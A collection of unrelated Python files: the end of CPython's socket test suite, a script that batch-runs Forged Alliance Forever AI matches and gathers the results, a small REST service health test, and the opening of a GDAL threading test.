first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
        # Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(socket.error) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(socket.error) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except socket.error:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
        # platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
if not hasattr(signal, "alarm"):
return # can only test on *nix
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
try:
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except socket.error:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(socket.error, Exception))
self.assertTrue(issubclass(socket.herror, socket.error))
self.assertTrue(issubclass(socket.gaierror, socket.error))
self.assertTrue(issubclass(socket.timeout, socket.error))
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen(1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(socket.error, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
sock.bind(path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as a AF_UNIX path"
.format(path))
else:
raise
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
if not os.path.isfile("/proc/modules"):
return False
with open("/proc/modules") as f:
for line in f:
if line.startswith("tipc "):
return True
if support.verbose:
print("TIPC module is not loaded, please 'sudo modprobe tipc'")
return False
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen(5)
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
        # There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(socket.error, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(socket.error, sock.sendall, b'foo')
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@unittest.skipUnless(fcntl, "module fcntl not available")
class CloexecConstantTest(unittest.TestCase):
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertTrue(s.type & socket.SOCK_CLOEXEC)
self.assertTrue(fcntl.fcntl(s, fcntl.F_GETFD) & fcntl.FD_CLOEXEC)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertTrue(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), timeout)
else:
self.assertFalse(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), None)
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
        # Socket sharing is expected to work only for blocking sockets,
        # since the internal Python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
FileObjectInterruptedTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
CloexecConstantTest,
NonblockConstantTest
])
if hasattr(socket, "socketpair"):
tests.append(BasicSocketPairTest)
if hasattr(socket, "AF_UNIX"):
tests.append(TestUnixDomain)
if sys.platform == 'linux':
tests.append(TestLinuxAbstractNamespace)
if isTipcAvailable():
tests.append(TIPCTest)
tests.append(TIPCThreadableTest)
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
])
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
run_batch.py
import threading, subprocess, os, random, time, json
import pygetwindow as gw
N = 8
root = "C:\\ProgramData\\FAForever\\"
cwd = os.getcwd()
logDir = cwd+"\\output\\"
resultPath = cwd+"\\results.txt"
print(cwd)
if not os.path.isdir(logDir):
os.mkdir(logDir)
if not os.path.isdir(root):
print("Unable to find FAForever folder!")
exit()
factionDict = {
"Random": 0,
"UEF": 1,
"Aeon": 2,
"Cybran": 3,
"Seraphim": 4,
}
# Minimise windows with "Forged Alliance" in title
obnoxious = True
# In seconds
maxGameTime = 45*60
"""
Some AI keys for your convenience:
"rush" - Rush AI
"sorianrush" - Sorian AI Rush
"RNGStandard" - RNG Standard AI
"DalliConstAIKey" - Dalli AI
"uvesorush" - Uveso Rush AI
"swarmterror" - Swarm Terror AI
To find the AI key of any given AI, look in the \\lua\\AI\\CustomAIs_v2 directory in the mod files.
"""
dup = 1
exps = [
# Format: {"map": "<path to map scenario.lua>", "ais": [(<spawn index>, <AI key>, <faction string (see factionDict)>)] }
{"map": "SCMP_007", "ais": [(1, "rush", "UEF"), (2, "sorianrush", "Random")]},
{"map": "SCMP_007", "ais": [(2, "rush", "UEF"), (1, "sorianrush", "Random")]},
]
print(len(exps))
random.shuffle(exps)
def get_result(fp,res):
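    """Scan the game log at fp for "AutoRunEndResult|" and "victory" lines,
    appending their payloads to res["results"] and res["winners"]; return res."""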
try:
with open(fp) as f:
for line in f:
if "AutoRunEndResult|" in line:
res["results"].append(line[:-1].split("|",1)[1])
if "victory" in line:
winner_index = int(line.split("|")[1])
res["winners"].append(winner_index)
except Exception as e:
print("Exception: {}".format(e))
return res
def run_experiments(exps):
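    """Run the queued experiments with at most N games in flight at once.

    Each free slot gets a worker thread running run_exp(); the loop polls
    every 10 seconds, optionally minimising any "Forged Alliance" windows,
    until every experiment has been started and finished.
    """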
slots = [None for _ in range(N)]
done = False
lock = threading.Lock()
exp_num = 0
with open(resultPath,"w") as f:
# Clean the results file for this batch
f.write("")
while not done:
done = True
# Kickoff threads
for i in range(N):
            if slots[i] is None or not slots[i].is_alive():
if exp_num < len(exps):
slots[i] = threading.Thread(target=run_exp,args=(exps[exp_num],lock))
slots[i].start()
exp_num += 1
done = False
break
elif slots[i].is_alive():
done = False
# Minimise windows
if obnoxious:
for w in gw.getWindowsWithTitle("Forged Alliance"):
if not w.isMinimized:
w.minimize()
# And wait...
time.sleep(10)
def run_exp(exp,lock):
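    """Launch a single game via ForgedAlliance.exe with the autorun init
    script, wait for it to exit, collect results from its .sclog file, and
    append them as one JSON line to results.txt (guarded by lock)."""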
# Separate log files with a random ID
id = "".join([random.choice("1234567890ABCDEF") for _ in range(8)])
logfile = logDir+"log_"+id
args = [
root+"bin\\ForgedAlliance.exe",
"/nobugreport", "/nosound", "/exitongameover",
"/init", root+"bin\\init_autorun.lua",
"/map", exp["map"],
"/log", logfile,
"/maxtime", str(maxGameTime),
"/aitest", mk_test_string(exp["ais"])
]
subprocess.call(args)
exp["results"] = []
exp["winners"] = []
result = get_result(logfile+".sclog",exp)
os.remove(logfile+".sclog")
lock.acquire()
with open(resultPath,"a") as f:
f.write(json.dumps(result)+"\n")
lock.release()
def mk_test_string(ais):
res = ",".join(["{}:{}:{}".format(ai[0],ai[1],factionDict[ai[2]]) for ai in ais])
return res
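# Illustrative note (uses the sample exps above; any other values are hypothetical):
# mk_test_string turns each (spawn index, AI key, faction) tuple into
# "<index>:<key>:<faction id>" and joins them with commas, so
#   mk_test_string([(1, "rush", "UEF"), (2, "sorianrush", "Random")])
# yields "1:rush:1,2:sorianrush:0", which is passed as the /aitest argument.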
start = time.time()
run_experiments(exps)
print("Time taken: {}s".format(round(time.time()-start)))
|
online.py
|
'''
Online tests
'''
import unittest
from unittest import TestCase
from mock import MagicMock
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from rest_service import RestService
import time
import requests
from threading import Thread
class TestRestService(TestCase):
# random port number for local connections
port_number = 62976
def setUp(self):
self.rest_service = RestService("localsettings.py")
self.rest_service.setup()
self.rest_service.settings['FLASK_PORT'] = self.port_number
def run_server():
self.rest_service.run()
self._server_thread = Thread(target=run_server)
        self._server_thread.daemon = True
self._server_thread.start()
# sleep 10 seconds for everything to boot up
time.sleep(10)
def test_status(self):
r = requests.get('http://127.0.0.1:{p}'.format(p=self.port_number))
results = r.json()
self.assertEqual(results['node_health'], 'GREEN')
def tearDown(self):
self.rest_service.close()
if __name__ == '__main__':
unittest.main()
|
thread_test.py
|
#!/usr/bin/env pytest
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test Python threading
# Author: Even Rouault <even dot rouault at spatialys.com>
#
###############################################################################
# Copyright (c) 2016, Even Rouault <even dot rouault at spatialys dot com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import threading
try:
import numpy # noqa
numpy_available = True
except ImportError:
numpy_available = False
from osgeo import gdal
import pytest
def my_error_handler(err_type, err_no, err_msg):
# pylint: disable=unused-argument
pass
def thread_test_1_worker(args_dict):
for i in range(1000):
ds = gdal.Open('data/byte.tif')
if (i % 2) == 0:
if ds.GetRasterBand(1).Checksum() != 4672:
args_dict['ret'] = False
else:
ds.GetRasterBand(1).ReadAsArray()
for i in range(1000):
gdal.PushErrorHandler(my_error_handler)
ds = gdal.Open('i_dont_exist')
gdal.PopErrorHandler()
